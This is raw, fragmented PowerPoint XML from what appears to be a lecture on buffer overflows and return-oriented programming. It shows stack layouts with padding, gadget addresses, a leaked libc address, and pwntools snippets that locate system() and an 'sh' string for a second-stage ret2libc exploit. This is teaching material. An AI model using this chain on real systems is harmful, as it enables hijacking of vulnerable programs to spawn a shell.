                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>0x0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rdi</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="20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0x404018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rbp</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="20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effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>JUNKJUNK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effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>0x401274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6" name="Arrow: Up 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22F590C-C066-7B6D-789E-E162101F3785}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8492658" y="3886033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4AB0F8-ED36-7966-6CCE-4F506E7A813B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1086804" y="1616750"/>
            <a:ext cx="6958706" cy="297132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puts_glibc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 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0x404018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puts_plts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0x401070 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ret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   # 0x40101a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main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0x4010b0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400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D8FD2C6A-1E4B-9E30-6CBC-C49BAE2D9123}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="740474" y="2968523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45667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r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Why is Buffer Overflow relevant?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>What is Buffer Overflow?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>What is Return Object Programming (ROP)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>How to prevent BOF exploits?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"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355495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Leaking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t> Address (cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" err="1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FC8B0D5-8230-2C4A-B547-66BA8B24FA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0872775"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8834371" y="1249936"/>
          <a:ext cx="2630109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0x4010b0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98324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0x40101a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96253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0x401070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  <a:endParaRPr lang="en-US" sz="2200" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof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F24F0A9-7619-5EDF-F343-3631E5339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887400"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5746018" y="4637046"/>
          <a:ext cx="2955763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494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013269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rax</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="20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baseline="0" noProof="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>0x0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rdi</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="20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0x404018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rbp</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="20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effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>JUNKJUNK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effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>0x401070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6" name="Arrow: Up 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22F590C-C066-7B6D-789E-E162101F3785}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8494555" y="3295474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ACCFFF-74BF-E562-4366-C317626F6690}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1063477" y="1617834"/>
            <a:ext cx="6976426" cy="2962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puts_glibc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 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0x404018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puts_plts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0x401070 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ret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0x40101a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main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0x4010b0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400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166F8A23-6EA7-6358-124B-837551B1A0A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="794903" y="3372849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20B8718B-5EAA-4681-11B7-533E63968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174" y="5087195"/>
            <a:ext cx="5487190" cy="6240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b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0x7f365d1a9420</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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5486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+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0x7f365d1a9420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Leaking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t> Address (cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" err="1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FC8B0D5-8230-2C4A-B547-66BA8B24FA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7346324"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8803268" y="1164406"/>
          <a:ext cx="2630109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0x4010b0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98324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0x40101a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96253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0x401070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  <a:endParaRPr lang="en-US" sz="2200" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof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F24F0A9-7619-5EDF-F343-3631E5339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872201"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5668263" y="4683700"/>
          <a:ext cx="2955763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494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013269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rax</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="20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baseline="0" noProof="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>0x0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rdi</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="20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0x404018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rbp</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="20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effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>JUNKJUNK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effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>0x401070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6" name="Arrow: Up 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22F590C-C066-7B6D-789E-E162101F3785}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8440125" y="2622418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FE4EA9-7ED7-F326-BC95-E93EC706F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174" y="5087195"/>
            <a:ext cx="5487190" cy="6240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b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0x7f365d1a9420</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Consola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49BF41-3412-E6BB-0040-70254CC94368}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1086804" y="1616750"/>
            <a:ext cx="7020729" cy="297132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puts_glibc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 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0x404018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puts_plts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0x401070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 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ret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0x40101a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main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0x4010b0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400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E48FF074-BDF1-2E90-C5A4-17A3CB13D220}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="740474" y="3691645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50710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+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0x7f365d1a9420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Leaking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t> Address (cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" err="1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FC8B0D5-8230-2C4A-B547-66BA8B24FA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6130330"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8849921" y="1242161"/>
          <a:ext cx="2630109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0x4010b0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98324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0x40101a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96253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0x401070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  <a:endParaRPr lang="en-US" sz="2200" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof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F24F0A9-7619-5EDF-F343-3631E5339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648167"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5442857" y="4665306"/>
          <a:ext cx="3301683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2796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248887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rax</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="20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baseline="0" noProof="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>0x0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rdi</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="20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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>0x7ffff7faf7e0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rbp</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="20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effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>JUNKJUNK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effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>0x40101a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6" name="Arrow: Up 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22F590C-C066-7B6D-789E-E162101F3785}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8514467" y="2022566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B68250-E124-EE51-D44D-CCB817BA2076}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1086804" y="1616750"/>
            <a:ext cx="7047311" cy="297132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puts_glibc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 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0x404018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puts_plts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0x401070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 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ret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 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0x40101a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main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0x4010b0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400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E1C5567E-190B-AC6A-E30D-39768F181801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="802678" y="4080421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DE8842B-8C33-A50A-263E-CDFEF56E9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1" y="5048317"/>
            <a:ext cx="4849598" cy="6240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b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0x7f365d1a9420</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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4338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Time to Do Some Math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572385-14B7-1800-ECA9-50608887AA5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1294621" y="1772815"/>
            <a:ext cx="9462796" cy="4105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from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pwn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import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*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ELF(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'/lib/x86_64-linux-gnu/libc.so.6'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</a:t>
            </a:r>
          </a:p>
          <a:p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= 0x7f365d1a9420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'puts'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–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endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="00B0F0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'system'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next(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libc.search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2400" err="1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b"sh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\0"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))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 algn="ctr"/>
            <a:endParaRPr lang="en-US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91057-D0D4-9BDF-6FA6-63519EFB8EA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1535664" y="1982755"/>
            <a:ext cx="4525346" cy="466531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79E17-0597-E1BA-A820-F0DB2CA356D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1527888" y="3024673"/>
            <a:ext cx="8623040" cy="2519265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A783B-B6BB-20CD-68EC-C63634E9C22B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8257591" y="2978020"/>
            <a:ext cx="25332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92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t># Load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>libc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" err="1">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Garamond" panose="02020404030301010803"/>
            </a:endParaRP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 library</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="92D05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59037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ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Time to Do Some Math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572385-14B7-1800-ECA9-50608887AA5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1294621" y="1772815"/>
            <a:ext cx="9462796" cy="4105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from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pwn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import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*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ELF(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'/lib/x86_64-linux-gnu/libc.so.6'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</a:t>
            </a:r>
          </a:p>
          <a:p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= 0x7f365d1a9420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'puts'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–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endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="00B0F0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'system'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next(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libc.search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2400" err="1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b"sh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\0"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))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 algn="ctr"/>
            <a:endParaRPr lang="en-US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91057-D0D4-9BDF-6FA6-63519EFB8EA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1527889" y="1982755"/>
            <a:ext cx="8070978" cy="1003041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79E17-0597-E1BA-A820-F0DB2CA356D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1527888" y="4424264"/>
            <a:ext cx="8623040" cy="1119674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08AD2-6420-5BDA-BD94-3310F018F925}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8257591" y="2978020"/>
            <a:ext cx="253326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92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t># Calculate </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" err="1">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Garamond" panose="02020404030301010803"/>
            </a:endParaRP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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> base</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
            </a:endParaRP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 address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="92D05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99904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ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Time to Do Some Math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572385-14B7-1800-ECA9-50608887AA5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1294621" y="1772815"/>
            <a:ext cx="9462796" cy="4105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from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pwn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import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*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ELF(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'/lib/x86_64-linux-gnu/libc.so.6'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</a:t>
            </a:r>
          </a:p>
          <a:p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= 0x7f365d1a9420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'puts'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–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endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="00B0F0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'system'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next(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libc.search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2400" err="1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b"sh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\0"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))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 algn="ctr"/>
            <a:endParaRPr lang="en-US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91057-D0D4-9BDF-6FA6-63519EFB8EA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1527889" y="1982755"/>
            <a:ext cx="8070978" cy="2379306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79E17-0597-E1BA-A820-F0DB2CA356D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1527888" y="4906346"/>
            <a:ext cx="8623040" cy="637592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08AD2-6420-5BDA-BD94-3310F018F925}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8257591" y="2978020"/>
            <a:ext cx="253326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92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t># Calculate </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" err="1">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Garamond" panose="02020404030301010803"/>
            </a:endParaRP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 system() </a:t>
            </a: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 address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="92D05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51886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ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Time to Do Some Math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572385-14B7-1800-ECA9-50608887AA5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1294621" y="1772815"/>
            <a:ext cx="9462796" cy="4105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from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pwn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import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*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ELF(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'/lib/x86_64-linux-gnu/libc.so.6'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</a:t>
            </a:r>
          </a:p>
          <a:p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= 0x7f365d1a9420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'puts'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–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endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="00B0F0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'system'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next(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libc.search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2400" err="1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b"sh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\0"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))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 algn="ctr"/>
            <a:endParaRPr lang="en-US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91057-D0D4-9BDF-6FA6-63519EFB8EA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1527889" y="1982755"/>
            <a:ext cx="8070978" cy="2954693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79E17-0597-E1BA-A820-F0DB2CA356D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1527888" y="5543938"/>
            <a:ext cx="8623040" cy="46652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08AD2-6420-5BDA-BD94-3310F018F925}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8257591" y="2978020"/>
            <a:ext cx="253326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92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t># Locate </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" err="1">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Garamond" panose="02020404030301010803"/>
            </a:endParaRP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 "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>\0"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Garamond" panose="02020404030301010803"/>
            </a:endParaRP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 inside </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>libc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRP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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="92D05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11425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ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Time to Do Some Math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572385-14B7-1800-ECA9-50608887AA5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1294621" y="1772815"/>
            <a:ext cx="9462796" cy="4105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from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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pwn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import 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*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dirty="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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="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 dirty="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ELF(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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'/lib/x86_64-linux-gnu/libc.so.6'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= 0x7f365d1a9420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dirty="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r>
              <a:rPr lang="en-US" sz="2400" dirty="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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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'puts'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dirty="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 dirty="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 dirty="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 dirty="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–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="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endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0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dirty="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 dirty="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 dirty="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 dirty="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 dirty="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'system'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dirty="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 dirty="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 dirty="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 dirty="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 dirty="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next(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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libc.search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b"sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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\0"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))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 algn="ctr"/>
            <a:endParaRPr lang="en-US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4507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Second Stage Exploit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C4369DA1-D0D2-ABD7-CC0B-228490B3F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4141823"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8761546" y="1707532"/>
          <a:ext cx="2630109" cy="426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noProof="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>system_addr</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2200" b="0" i="0" u="none" strike="noStrike" noProof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noProof="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>sh_addr</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2200" b="0" i="0" u="none" strike="noStrike" noProof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05266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  <a:endParaRPr lang="en-US" sz="2200" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof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8B8B177-765D-B8D9-4F06-791B03BAE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047267"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5481651" y="4573782"/>
          <a:ext cx="2955763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494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013269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err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>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baseline="0" noProof="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>0x0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err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>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0x0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err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>rbp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noProof="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>JUNKJUNK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 dirty="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0x401273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17" name="Arrow: Up 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB38715B-950A-2C67-29BD-84BE907307CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8382283" y="3754229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77B852-0F08-6E3F-F948-2E12CEFB893B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
